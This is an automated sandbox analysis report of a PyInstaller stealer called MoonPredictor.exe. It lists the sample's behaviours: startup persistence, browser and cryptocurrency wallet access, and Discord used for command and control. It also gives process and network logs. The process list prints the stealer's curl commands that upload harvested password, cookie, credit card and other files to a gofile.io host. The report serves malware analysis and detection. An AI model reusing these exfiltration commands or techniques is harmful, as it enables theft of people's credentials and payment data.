Malware Analysis Report

2025-05-05 21:33

Sample ID 240529-q9pr1sgf2t
Target MoonPredictor.exe
SHA256 6fa636aaa6c81a0fc336a2e08dfbdd2d31c54da9a1dd44328f8c997c919644cc
Tags
pyinstaller spyware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

6fa636aaa6c81a0fc336a2e08dfbdd2d31c54da9a1dd44328f8c997c919644cc

Threat Level: Shows suspicious behavior

The file MoonPredictor.exe was found to show suspicious behavior.

Malicious Activity Summary

pyinstaller spyware stealer

Reads user/profile data of web browsers

Loads dropped DLL

Drops startup file

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Detects Pyinstaller

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Modifies registry class

Suspicious use of WriteProcessMemory

Checks processor information in registry

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-29 13:57

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 13:57

Reported

2024-05-29 13:58

Platform

win10-20240404-en

Max time kernel

18s

Max time network

20s

Command Line

"C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MoonPredictor.exe C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1452 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe
PID 1452 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe
PID 948 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe C:\Windows\system32\cmd.exe
PID 948 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe C:\Windows\system32\cmd.exe
PID 2488 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2488 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2896 wrote to memory of 3732 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3732 wrote to memory of 4080 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe

"C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe"

C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe

"C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.0.906147803\1893837670" -parentBuildID 20221007134813 -prefsHandle 1728 -prefMapHandle 1720 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6f4a56e-7f05-494e-bf07-1cc008ff0584} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 1808 23262418e58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.1.457057340\966823217" -parentBuildID 20221007134813 -prefsHandle 2152 -prefMapHandle 2148 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {463e25bb-f02d-4077-b7a0-b4f87e8e6324} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 2164 232611f9558 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.2.419601715\1102580640" -childID 1 -isForBrowser -prefsHandle 2744 -prefMapHandle 2672 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b71937f-63e3-4b1e-8e28-7f07aa756660} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 2980 232652f6058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.3.1582382032\611746898" -childID 2 -isForBrowser -prefsHandle 3252 -prefMapHandle 3240 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e324d50-9887-402a-a8af-32ea75c06e19} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 3488 23263c46958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.4.2075582435\119602772" -childID 3 -isForBrowser -prefsHandle 4152 -prefMapHandle 4148 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0891d646-24ee-45ff-b2c8-721f08daf540} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4164 23266a43058 tab

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store1.gofile.io/uploadFile"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.5.1460825049\1895753631" -childID 4 -isForBrowser -prefsHandle 4772 -prefMapHandle 4764 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7310d7e7-b208-4d54-94c8-8fb007babae8} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4800 232675fbc58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.6.1703885957\1381724603" -childID 5 -isForBrowser -prefsHandle 4932 -prefMapHandle 4936 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2bcd844-d8cf-430a-b0da-a769fc9a7a7c} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4924 232675fbf58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.7.1066197513\73023151" -childID 6 -isForBrowser -prefsHandle 4800 -prefMapHandle 4704 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f731f79-c6c7-47c6-ab1f-abecd794a564} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5108 23268249858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.8.726074387\271029873" -childID 7 -isForBrowser -prefsHandle 5628 -prefMapHandle 4632 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0afa0caf-b2df-49c2-9cdc-5e0f9687892c} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5680 23267283c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.9.2104782825\18777930" -parentBuildID 20221007134813 -prefsHandle 5820 -prefMapHandle 5804 -prefsLen 26328 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b8583cf-5b53-40ee-8fd5-aae620ff6034} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5688 232690bc258 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.10.477575502\1755831304" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5992 -prefMapHandle 5988 -prefsLen 26328 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07070499-f44f-4f3e-b13d-82563c2a72cf} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 6004 23269031558 utility

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupReceive.ttc" https://store1.gofile.io/uploadFile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupUnregister.clr" https://store1.gofile.io/uploadFile"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.11.671860188\408956740" -childID 8 -isForBrowser -prefsHandle 5368 -prefMapHandle 5288 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {52f650e6-a64d-4529-8ad2-f5d87f8af2c3} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4732 23265263258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.12.1880285698\1255029390" -childID 9 -isForBrowser -prefsHandle 2856 -prefMapHandle 2852 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {00bf6b26-94a8-4cfb-89f1-5eeb35e66db1} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4868 2326731a358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.13.824097604\555468084" -childID 10 -isForBrowser -prefsHandle 5156 -prefMapHandle 4732 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {027e6729-4eb2-45e9-9f92-842e92b00422} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 6548 2326759f558 tab

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 205.13.26.104.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
N/A 127.0.0.1:49921 tcp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 44.237.98.207:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 44.237.65.238:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 www.google.com udp
US 162.159.138.232:443 discord.com tcp
FR 172.217.20.196:443 www.google.com tcp
US 162.159.138.232:443 discord.com tcp
N/A 127.0.0.1:49929 tcp
US 8.8.8.8:53 238.65.237.44.in-addr.arpa udp
US 8.8.8.8:53 196.20.217.172.in-addr.arpa udp
FR 172.217.20.196:443 www.google.com udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 www.google.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
GB 172.217.169.3:443 ssl.gstatic.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
